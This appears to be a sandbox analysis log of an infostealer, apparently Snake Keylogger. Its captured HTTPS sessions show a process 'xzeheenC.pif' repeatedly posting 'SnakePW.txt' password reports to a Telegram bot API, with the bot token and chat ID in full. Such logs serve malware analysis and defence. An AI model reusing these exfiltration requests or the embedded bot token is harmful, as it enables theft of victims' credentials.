                                                                                                        2024-12-18 15:32:15 UTC517INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 33 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419216,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535935,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        100192.168.2.849887149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:15 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd21d54c9e0a5c
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:15 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 64 35 34 63 39 65 30 61 35 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd21d54c9e0a5cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:32:16 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:15 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:16 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 33 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419218,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535935,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        101192.168.2.849889149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:16 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd23af6eeb12b8
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:16 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 61 66 36 65 65 62 31 32 62 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd23af6eeb12b8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:32:16 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:16 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 517
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:16 UTC517INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 33 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419220,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535936,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        102192.168.2.849890149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:17 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd22de9ba98f31
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:17 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 64 65 39 62 61 39 38 66 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd22de9ba98f31Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:32:17 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:17 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:17 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 33 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419222,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535937,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        103192.168.2.849895149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:17 UTC352OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd21f79a600637
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-18 15:32:17 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 66 37 39 61 36 30 30 36 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd21f79a600637Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:32:18 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:17 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:18 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 33 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419224,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535937,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        104192.168.2.849897149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:18 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd24077f7c4b2d
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:18 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 30 37 37 66 37 63 34 62 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd24077f7c4b2dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:32:19 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:18 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:19 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 33 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419226,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535938,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        105192.168.2.849898149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:19 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd231c021e891b
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:19 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 31 63 30 32 31 65 38 39 31 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd231c021e891bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:32:19 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:19 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:19 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 33 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419228,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535939,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        106192.168.2.849900149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:19 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd221edce7d449
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:19 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 31 65 64 63 65 37 64 34 34 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd221edce7d449Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:32:20 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:19 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
